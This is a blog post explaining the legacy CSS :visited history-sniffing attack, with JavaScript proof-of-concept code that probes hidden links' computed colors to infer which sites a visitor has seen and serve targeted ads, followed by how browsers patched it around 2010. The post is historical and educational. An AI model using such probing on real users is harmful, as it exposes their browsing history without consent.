Furkan Baytekin

History Sniffing on Legacy CSS: How Browsers Used to Leak Your Past

Learn a classic web privacy exploit that exposed users' browsing histories


In the early 2000s, a clever CSS trick gave websites the ability to peek into your browsing history. The technique, known as history sniffing, was widely known before being mitigated by browser vendors around 2010. In this post, we'll explore how it worked, walk through a proof-of-concept (PoC), and see why it no longer works today.

What Is History Sniffing?

History sniffing is a technique that allowed a malicious website to determine which other websites you had previously visited. This was possible using CSS pseudo-selectors, particularly :visited, in combination with JavaScript to infer the visual differences between visited and unvisited links.

The Core Idea

By rendering a list of links (e.g., popular sites) on the page and checking the computed style of each link, a site could determine which links the user had previously clicked.

```html
<style>
  a:visited {
    color: rgb(255, 0, 0); /* Red for visited */
  }
  a {
    color: rgb(0, 0, 255); /* Blue for unvisited */
    position: absolute;
    left: -9999px; /* Hide from view */
  }
</style>
```

Using JavaScript, the attacker could inspect the rendered color:

```javascript
const color = getComputedStyle(link).color;
if (color === "rgb(255, 0, 0)") {
  // The link was visited!
}
```
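The classification step boils down to a pure function: given a batch of probe links and the colors read back from the renderer, keep the URLs whose color betrays a prior visit. Here's a minimal sketch (the helper name `sniffVisited` is mine, and it assumes the stylesheet above, where visited links render as `rgb(255, 0, 0)`):

```javascript
// Color the stylesheet assigns to visited links (assumption from the CSS above).
const VISITED_COLOR = "rgb(255, 0, 0)";

// Each probe pairs a URL with the color read back via getComputedStyle.
// Returns only the URLs whose rendered color reveals a prior visit.
function sniffVisited(probes) {
  return probes
    .filter(({ color }) => color === VISITED_COLOR)
    .map(({ url }) => url);
}
```

An attacker would build the probe list from hidden `<a>` elements, read each computed color, and feed the pairs into a function like this.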

Realistic Use Case: Targeted Ads

Let’s say an attacker wants to tailor ads based on your browsing history:

Here’s a theoretical demo (non-working today, since browsers fixed this around 2010) that shows how this logic might have looked:

```javascript
const siteCategories = {
  "https://www.ultimate-guitar.com": "music",
  "https://www.bodybuilding.com": "fitness",
  "https://www.goal.com": "sports"
};

const visitedCategories = new Set();

// Inject a hidden link for every probe URL.
Object.entries(siteCategories).forEach(([url, category], i) => {
  const a = document.createElement("a");
  a.href = url;
  a.textContent = "link" + i;
  a.id = "link" + i;
  a.style.display = "none";
  document.body.appendChild(a);
});

// Give the browser a moment to apply :visited styles, then read them back.
setTimeout(() => {
  Object.entries(siteCategories).forEach(([_, category], i) => {
    const el = document.getElementById("link" + i);
    const color = getComputedStyle(el).color;
    if (color === "rgb(255, 0, 0)") {
      visitedCategories.add(category);
    }
  });
  recommendAdBasedOn(visitedCategories);
}, 100);

function recommendAdBasedOn(categories) {
  if (categories.has("music")) {
    showAd("🎸 Guitars & lessons tailored just for you!");
  } else if (categories.has("fitness")) {
    showAd("💪 Protein deals for your gains!");
  } else if (categories.has("sports")) {
    showAd("⚽ Official football jerseys now in stock!");
  } else {
    showAd("🌐 Discover something new, every day.");
  }
}

function showAd(text) {
  const ad = document.createElement("div");
  ad.textContent = text;
  ad.style = "position:fixed; bottom:10px; right:10px; background:#ffc; padding:10px; z-index: 9999;";
  document.body.appendChild(ad);
}
```

⚠️ Disclaimer: This is for educational purposes only. Modern browsers have patched this vulnerability, so this code won’t work in them.

How Browsers Fixed It

Around 2010, major browsers including Firefox, Chrome, and Safari introduced changes:

- :visited rules were restricted to a small set of color-related properties (such as color and background-color), so visited styling can no longer change layout, sizing, or trigger extra resource loads.
- getComputedStyle and similar APIs began reporting the unvisited style for links, regardless of whether the user had actually visited them.
- Visited styling is applied only at paint time, out of reach of scripts.

Fun Fact

Firefox addressed it in Bug 147777 and WebKit (Safari/Chrome) in Bug 16760.
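The key change was that getComputedStyle began reporting the unvisited style for links regardless of actual history. That behavior can be modeled in a few lines of plain JavaScript (an illustrative sketch with constants borrowed from the CSS above, not real browser code):

```javascript
const UNVISITED_STYLE = "rgb(0, 0, 255)"; // blue, as in the earlier CSS
const VISITED_STYLE = "rgb(255, 0, 0)";   // red, as in the earlier CSS

// What a script observes when it asks for a link's computed color.
function reportedColor(actuallyVisited, mitigationEnabled) {
  if (mitigationEnabled) {
    // Post-2010 behavior: scripts always see the unvisited style.
    return UNVISITED_STYLE;
  }
  // Legacy behavior: the real style leaks the visited state.
  return actuallyVisited ? VISITED_STYLE : UNVISITED_STYLE;
}
```

With the mitigation in place, visited and unvisited links are indistinguishable from script, which is exactly why the PoC above stopped working.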

Conclusion

What was once a subtle CSS trick turned into a full-blown privacy issue, ultimately fixed by a coordinated effort across browser vendors. It serves as a historical lesson in how even the most innocuous web features can be abused.
